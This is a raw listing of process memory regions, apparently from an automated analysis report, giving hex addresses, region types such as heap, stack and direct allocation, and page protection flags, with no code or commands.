7011000
|
heap
|
page read and write
|
||
DA9000
|
heap
|
page read and write
|
||
56D0000
|
trusted library allocation
|
page read and write
|
||
2006EA70000
|
heap
|
page read and write
|
||
5A2687E000
|
stack
|
page read and write
|
||
E8D000
|
stack
|
page read and write
|
||
5668000
|
trusted library allocation
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
306000
|
unkown
|
page write copy
|
||
4601000
|
heap
|
page read and write
|
||
567F000
|
trusted library allocation
|
page read and write
|
||
35E000
|
unkown
|
page execute and write copy
|
||
46F1000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
9FB000
|
stack
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
7FF712290000
|
unkown
|
page readonly
|
||
5686000
|
trusted library allocation
|
page read and write
|
||
5341000
|
direct allocation
|
page read and write
|
||
D7C000
|
heap
|
page read and write
|
||
5662000
|
trusted library allocation
|
page read and write
|
||
D8D000
|
heap
|
page read and write
|
||
7FF68FAC1000
|
unkown
|
page execute read
|
||
C10000
|
heap
|
page read and write
|
||
C61A4F9000
|
stack
|
page read and write
|
||
1E365850000
|
heap
|
page read and write
|
||
7FF68FAC0000
|
unkown
|
page readonly
|
||
1E365876000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
FC0000
|
unkown
|
page readonly
|
||
4E61000
|
heap
|
page read and write
|
||
56E0000
|
trusted library allocation
|
page read and write
|
||
2681096C000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
56AC000
|
trusted library allocation
|
page read and write
|
||
567C000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
388E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
3D7000
|
unkown
|
page execute and write copy
|
||
17BA000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
541F000
|
stack
|
page read and write
|
||
CEC000
|
unkown
|
page write copy
|
||
54E0000
|
direct allocation
|
page execute and read and write
|
||
268109B3000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
1FB3D2A9000
|
heap
|
page read and write
|
||
16DB000
|
stack
|
page read and write
|
||
4A90000
|
direct allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4E00000
|
direct allocation
|
page read and write
|
||
2B5F000
|
stack
|
page read and write
|
||
17B5000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
C3F000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
57C5000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
397D000
|
stack
|
page read and write
|
||
13A2000
|
unkown
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
566F000
|
trusted library allocation
|
page read and write
|
||
79582FF000
|
stack
|
page read and write
|
||
309E000
|
stack
|
page read and write
|
||
1D566ACA000
|
heap
|
page read and write
|
||
51FE000
|
stack
|
page read and write
|
||
26810985000
|
heap
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page read and write
|
||
7071000
|
heap
|
page read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
2032D750000
|
heap
|
page read and write
|
||
140764000
|
unkown
|
page readonly
|
||
C34000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
1FDED680000
|
direct allocation
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
1D90FDE0000
|
heap
|
page read and write
|
||
26810996000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
160F000
|
stack
|
page read and write
|
||
566B000
|
trusted library allocation
|
page read and write
|
||
1E3661E6000
|
heap
|
page read and write
|
||
7AD000
|
stack
|
page read and write
|
||
1B778374000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
508E000
|
stack
|
page read and write
|
||
4D00000
|
direct allocation
|
page execute and read and write
|
||
445F000
|
stack
|
page read and write
|
||
3D8000
|
unkown
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
4B80000
|
direct allocation
|
page read and write
|
||
D45000
|
heap
|
page read and write
|
||
30EE000
|
stack
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
17CA000
|
heap
|
page read and write
|
||
7957EFE000
|
stack
|
page read and write
|
||
CEC000
|
unkown
|
page write copy
|
||
35CF000
|
stack
|
page read and write
|
||
4C0F000
|
stack
|
page read and write
|
||
DAA000
|
heap
|
page read and write
|
||
344000
|
unkown
|
page execute and write copy
|
||
15CC000
|
heap
|
page read and write
|
||
268109DE000
|
heap
|
page read and write
|
||
324E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
268109DD000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
DAA000
|
heap
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
67BE000
|
stack
|
page read and write
|
||
449000
|
unkown
|
page execute and write copy
|
||
4611000
|
heap
|
page read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
2EFE000
|
stack
|
page read and write
|
||
319000
|
unkown
|
page execute and read and write
|
||
7FF68FAE9000
|
unkown
|
page readonly
|
||
D4C000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
102D000
|
unkown
|
page readonly
|
||
2506000
|
heap
|
page read and write
|
||
7FF68FAC1000
|
unkown
|
page execute read
|
||
1611000
|
heap
|
page read and write
|
||
3FB000
|
unkown
|
page execute and read and write
|
||
C80000
|
unkown
|
page readonly
|
||
5665000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
342000
|
unkown
|
page execute and read and write
|
||
5420000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
C2A000
|
heap
|
page read and write
|
||
5693000
|
trusted library allocation
|
page read and write
|
||
52FF000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
6B8F000
|
stack
|
page read and write
|
||
3BC0000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
140000
|
unkown
|
page readonly
|
||
3E5E000
|
stack
|
page read and write
|
||
5662000
|
trusted library allocation
|
page read and write
|
||
175D000
|
stack
|
page read and write
|
||
608E000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
566B000
|
trusted library allocation
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
5678000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
44D000
|
unkown
|
page execute and read and write
|
||
178B000
|
heap
|
page read and write
|
||
CCE000
|
heap
|
page read and write
|
||
48D7AFE000
|
stack
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
910000
|
direct allocation
|
page read and write
|
||
567F000
|
trusted library allocation
|
page read and write
|
||
2F1F000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
4A9F000
|
stack
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
56B9000
|
trusted library allocation
|
page read and write
|
||
4596000
|
heap
|
page read and write
|
||
7FF68FAFA000
|
unkown
|
page read and write
|
||
7A76000
|
direct allocation
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
1E365841000
|
heap
|
page read and write
|
||
1D9B000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
20454C20000
|
direct allocation
|
page read and write
|
||
1E365869000
|
heap
|
page read and write
|
||
3D2F000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
289000
|
unkown
|
page readonly
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
3AF000
|
unkown
|
page execute and write copy
|
||
37DF000
|
stack
|
page read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
319F000
|
stack
|
page read and write
|
||
1785000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
45DE000
|
stack
|
page read and write
|
||
202A9220000
|
heap
|
page read and write
|
||
268121C0000
|
trusted library allocation
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
100E000
|
stack
|
page read and write
|
||
3A00000
|
direct allocation
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
5480000
|
direct allocation
|
page execute and read and write
|
||
20C0000
|
trusted library allocation
|
page read and write
|
||
422F000
|
stack
|
page read and write
|
||
26810973000
|
heap
|
page read and write
|
||
56A7000
|
trusted library allocation
|
page read and write
|
||
268109D1000
|
heap
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
40EF000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
424000
|
unkown
|
page execute and read and write
|
||
1AB4BCA0000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
458E000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
15CC000
|
heap
|
page read and write
|
||
18FE000
|
stack
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
F30000
|
heap
|
page read and write
|
||
1101000
|
unkown
|
page execute and read and write
|
||
1760000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1D911680000
|
heap
|
page read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
6BEF000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
77C0000
|
direct allocation
|
page execute and read and write
|
||
56E1000
|
trusted library allocation
|
page read and write
|
||
8BBF000
|
heap
|
page read and write
|
||
7FF68FAFD000
|
unkown
|
page readonly
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
2E1E000
|
stack
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
1AAB000
|
heap
|
page read and write
|
||
1B778610000
|
heap
|
page read and write
|
||
1B778300000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2B9C23E4000
|
heap
|
page read and write
|
||
1D90FDC0000
|
direct allocation
|
page read and write
|
||
2743DED0000
|
heap
|
page read and write
|
||
7957CF3000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
F40000
|
heap
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
46F1000
|
heap
|
page read and write
|
||
57F6000
|
trusted library allocation
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
566B000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
5678000
|
trusted library allocation
|
page read and write
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
44AF000
|
stack
|
page read and write
|
||
5660000
|
trusted library allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1E365835000
|
heap
|
page read and write
|
||
413000
|
unkown
|
page execute and read and write
|
||
268125BF000
|
heap
|
page read and write
|
||
950000
|
direct allocation
|
page read and write
|
||
1A2FFFE000
|
stack
|
page read and write
|
||
7450000
|
trusted library allocation
|
page read and write
|
||
5490000
|
direct allocation
|
page execute and read and write
|
||
C34000
|
heap
|
page read and write
|
||
AF0000
|
unkown
|
page readonly
|
||
1DDE000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
C2E000
|
heap
|
page read and write
|
||
1E365826000
|
heap
|
page read and write
|
||
CC000
|
stack
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
1E365E90000
|
heap
|
page read and write
|
||
CE4000
|
unkown
|
page execute and write copy
|
||
4601000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
26810926000
|
heap
|
page read and write
|
||
20454BF0000
|
direct allocation
|
page read and write
|
||
7878000
|
heap
|
page read and write
|
||
CEB000
|
unkown
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1E3661F4000
|
heap
|
page read and write
|
||
59CE000
|
stack
|
page read and write
|
||
15D0000
|
heap
|
page read and write
|
||
285000
|
unkown
|
page read and write
|
||
1D90FD50000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
454000
|
heap
|
page read and write
|
||
7220000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
430F000
|
stack
|
page read and write
|
||
1B2000
|
unkown
|
page execute and read and write
|
||
56E0000
|
trusted library allocation
|
page read and write
|
||
1AB4BB30000
|
heap
|
page read and write
|
||
1E365817000
|
heap
|
page read and write
|
||
2743F770000
|
direct allocation
|
page read and write
|
||
28FE000
|
stack
|
page read and write
|
||
3E5E000
|
stack
|
page read and write
|
||
D4E000
|
unkown
|
page execute and read and write
|
||
566F000
|
trusted library allocation
|
page read and write
|
||
149D000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1FB3D260000
|
heap
|
page read and write
|
||
11F6000
|
heap
|
page read and write
|
||
2B9C23D0000
|
heap
|
page read and write
|
||
5650000
|
heap
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
17CF000
|
heap
|
page read and write
|
||
26812590000
|
remote allocation
|
page read and write
|
||
424F000
|
stack
|
page read and write
|
||
1038DFE000
|
stack
|
page read and write
|
||
5450000
|
direct allocation
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
54B0000
|
heap
|
page read and write
|
||
342000
|
unkown
|
page execute and write copy
|
||
438F000
|
stack
|
page read and write
|
||
1E3661EF000
|
heap
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
7FF6BDA61000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
1E36582C000
|
heap
|
page read and write
|
||
4D10000
|
direct allocation
|
page execute and read and write
|
||
2B0F000
|
stack
|
page read and write
|
||
D0F000
|
unkown
|
page execute and read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
1750000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
288E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
26810989000
|
heap
|
page read and write
|
||
6C10000
|
heap
|
page read and write
|
||
1BB000
|
unkown
|
page execute and write copy
|
||
4C20000
|
direct allocation
|
page execute and read and write
|
||
79580FF000
|
stack
|
page read and write
|
||
7FF69F040000
|
unkown
|
page readonly
|
||
AF0000
|
unkown
|
page read and write
|
||
82DF000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
4C90000
|
direct allocation
|
page execute and read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
56B0000
|
trusted library allocation
|
page read and write
|
||
E4E000
|
stack
|
page read and write
|
||
D8C000
|
stack
|
page read and write
|
||
1038CFC000
|
stack
|
page read and write
|
||
2F1F000
|
stack
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
2006EA50000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1649000
|
unkown
|
page execute and read and write
|
||
56E9000
|
trusted library allocation
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
7FF6BD9D0000
|
unkown
|
page readonly
|
||
5694000
|
trusted library allocation
|
page read and write
|
||
31EF000
|
stack
|
page read and write
|
||
14EE000
|
stack
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
450E000
|
stack
|
page read and write
|
||
479F000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
13C0000
|
heap
|
page read and write
|
||
3D0F000
|
stack
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
566B000
|
trusted library allocation
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
26812220000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
1B778376000
|
heap
|
page read and write
|
||
428E000
|
stack
|
page read and write
|
||
13AD000
|
stack
|
page read and write
|
||
D0D000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
2681097E000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1038EFF000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1D5000
|
heap
|
page read and write
|
||
331E000
|
stack
|
page read and write
|
||
1106000
|
unkown
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
140764000
|
unkown
|
page readonly
|
||
26810961000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
6C5000
|
unkown
|
page execute and read and write
|
||
7FF68FAC0000
|
unkown
|
page readonly
|
||
4E61000
|
heap
|
page read and write
|
||
4610000
|
heap
|
page read and write
|
||
694F000
|
stack
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
381E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
3AAF000
|
stack
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
1E36582F000
|
heap
|
page read and write
|
||
56A8000
|
trusted library allocation
|
page read and write
|
||
41A000
|
unkown
|
page execute and read and write
|
||
D79000
|
heap
|
page read and write
|
||
51FF000
|
stack
|
page read and write
|
||
14042C000
|
unkown
|
page read and write
|
||
7FF69F040000
|
unkown
|
page readonly
|
||
54AE000
|
stack
|
page read and write
|
||
2CDE000
|
stack
|
page read and write
|
||
1D5668C0000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4F4E000
|
stack
|
page read and write
|
||
D7A000
|
unkown
|
page execute and read and write
|
||
1EA2CFE9000
|
heap
|
page read and write
|
||
58DD000
|
trusted library allocation
|
page read and write
|
||
1F30000
|
heap
|
page read and write
|
||
1700000
|
heap
|
page read and write
|
||
FC1000
|
unkown
|
page execute read
|
||
D84000
|
heap
|
page read and write
|
||
1481000
|
unkown
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
D7C000
|
heap
|
page read and write
|
||
5C0E000
|
stack
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
20B0000
|
trusted library allocation
|
page read and write
|
||
2FF5000
|
heap
|
page read and write
|
||
DB4C4FF000
|
stack
|
page read and write
|
||
2550000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
A3E7EFF000
|
stack
|
page read and write
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
C30000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
56D6000
|
trusted library allocation
|
page read and write
|
||
76CF000
|
stack
|
page read and write
|
||
7710000
|
direct allocation
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
5664000
|
trusted library allocation
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
4870000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
D8D000
|
heap
|
page read and write
|
||
7FF69F4CF000
|
unkown
|
page read and write
|
||
202A91D0000
|
heap
|
page read and write
|
||
D11000
|
unkown
|
page execute and write copy
|
||
4B11000
|
direct allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
7FF68FAC1000
|
unkown
|
page execute read
|
||
1D0E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
395E000
|
stack
|
page read and write
|
||
D0A000
|
heap
|
page read and write
|
||
7A80000
|
heap
|
page read and write
|
||
400E000
|
stack
|
page read and write
|
||
6DCF000
|
stack
|
page read and write
|
||
7FF71271F000
|
unkown
|
page read and write
|
||
4CC0000
|
direct allocation
|
page execute and read and write
|
||
56B4000
|
trusted library allocation
|
page read and write
|
||
1FB3D665000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
268125C5000
|
heap
|
page read and write
|
||
1E365823000
|
heap
|
page read and write
|
||
15EF000
|
heap
|
page read and write
|
||
D2A000
|
heap
|
page read and write
|
||
5690000
|
trusted library allocation
|
page read and write
|
||
1DF7000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
EE0000
|
heap
|
page read and write
|
||
40DE000
|
stack
|
page read and write
|
||
6C6000
|
unkown
|
page execute and write copy
|
||
140739000
|
unkown
|
page readonly
|
||
391F000
|
stack
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
2240000
|
heap
|
page read and write
|
||
1747000
|
heap
|
page read and write
|
||
5668000
|
trusted library allocation
|
page read and write
|
||
56A0000
|
trusted library allocation
|
page read and write
|
||
268125B8000
|
heap
|
page read and write
|
||
2A5C000
|
stack
|
page read and write
|
||
2460000
|
direct allocation
|
page read and write
|
||
3CDF000
|
stack
|
page read and write
|
||
2E60000
|
direct allocation
|
page execute read
|
||
D2A000
|
heap
|
page read and write
|
||
26810890000
|
heap
|
page read and write
|
||
1A9F000
|
stack
|
page read and write
|
||
26810964000
|
heap
|
page read and write
|
||
677E000
|
stack
|
page read and write
|
||
268109DB000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
534D000
|
stack
|
page read and write
|
||
4C20000
|
direct allocation
|
page execute and read and write
|
||
1026000
|
unkown
|
page read and write
|
||
FE0000
|
heap
|
page read and write
|
||
56AA000
|
trusted library allocation
|
page read and write
|
||
3C8000
|
unkown
|
page execute and write copy
|
||
C34000
|
heap
|
page read and write
|
||
D0B000
|
heap
|
page read and write
|
||
1011000
|
unkown
|
page readonly
|
||
4601000
|
heap
|
page read and write
|
||
7FF68FAFD000
|
unkown
|
page readonly
|
||
4C50000
|
direct allocation
|
page execute and read and write
|
||
56F1000
|
trusted library allocation
|
page read and write
|
||
1868DA1A000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
3000000
|
direct allocation
|
page read and write
|
||
4C2C000
|
stack
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
46F1000
|
heap
|
page read and write
|
||
D9B000
|
unkown
|
page execute and read and write
|
||
483D000
|
stack
|
page read and write
|
||
410F000
|
stack
|
page read and write
|
||
15F4000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
6F6C000
|
stack
|
page read and write
|
||
17A2000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
319000
|
unkown
|
page execute and read and write
|
||
5682000
|
trusted library allocation
|
page read and write
|
||
56B4000
|
trusted library allocation
|
page read and write
|
||
34AE000
|
stack
|
page read and write
|
||
56BB000
|
trusted library allocation
|
page read and write
|
||
32DF000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
5676000
|
trusted library allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
D88000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
910000
|
heap
|
page read and write
|
||
391F000
|
stack
|
page read and write
|
||
1FDEBBD5000
|
heap
|
page read and write
|
||
1E365DB0000
|
remote allocation
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
286000
|
unkown
|
page write copy
|
||
4E61000
|
heap
|
page read and write
|
||
3CDF000
|
stack
|
page read and write
|
||
4C20000
|
direct allocation
|
page execute and read and write
|
||
4C70000
|
direct allocation
|
page execute and read and write
|
||
291C000
|
heap
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
3FCF000
|
stack
|
page read and write
|
||
4E8E000
|
stack
|
page read and write
|
||
7FF69F4CD000
|
unkown
|
page execute and read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
436F000
|
stack
|
page read and write
|
||
48D79FF000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
248C0388000
|
heap
|
page read and write
|
||
1E365876000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
15D0000
|
heap
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
536F000
|
stack
|
page read and write
|
||
1BB000
|
unkown
|
page execute and write copy
|
||
17A1000
|
heap
|
page read and write
|
||
447000
|
unkown
|
page execute and write copy
|
||
1E36582E000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7FF68FAFD000
|
unkown
|
page readonly
|
||
56FA000
|
trusted library allocation
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
5686000
|
trusted library allocation
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
41A000
|
unkown
|
page execute and read and write
|
||
56AC000
|
trusted library allocation
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page read and write
|
||
1F05000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1740000
|
heap
|
page read and write
|
||
4D5E000
|
stack
|
page read and write
|
||
26810976000
|
heap
|
page read and write
|
||
14075E000
|
unkown
|
page execute read
|
||
CCF000
|
unkown
|
page readonly
|
||
56BD000
|
trusted library allocation
|
page read and write
|
||
1FE000
|
unkown
|
page write copy
|
||
4E61000
|
heap
|
page read and write
|
||
D8D000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
DEF000
|
unkown
|
page execute and write copy
|
||
1E365817000
|
heap
|
page read and write
|
||
26810971000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
45D000
|
unkown
|
page execute and write copy
|
||
3D6E000
|
stack
|
page read and write
|
||
1B778360000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
7FF6BD9D0000
|
unkown
|
page readonly
|
||
15F0000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
9C1000
|
unkown
|
page execute and read and write
|
||
8C03000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
CEC000
|
unkown
|
page read and write
|
||
2743F860000
|
heap
|
page read and write
|
||
36F000
|
unkown
|
page execute and read and write
|
||
F9D000
|
unkown
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
9E160FE000
|
stack
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
5F094FD000
|
stack
|
page read and write
|
||
1580000
|
heap
|
page read and write
|
||
1E365837000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
5686000
|
trusted library allocation
|
page read and write
|
||
20D0000
|
trusted library allocation
|
page read and write
|
||
D8B000
|
heap
|
page read and write
|
||
44F000
|
unkown
|
page execute and write copy
|
||
294E000
|
stack
|
page read and write
|
||
2743DEA0000
|
heap
|
page read and write
|
||
7760000
|
direct allocation
|
page execute and read and write
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
469F000
|
stack
|
page read and write
|
||
3E8F000
|
stack
|
page read and write
|
||
296F000
|
stack
|
page read and write
|
||
30D000
|
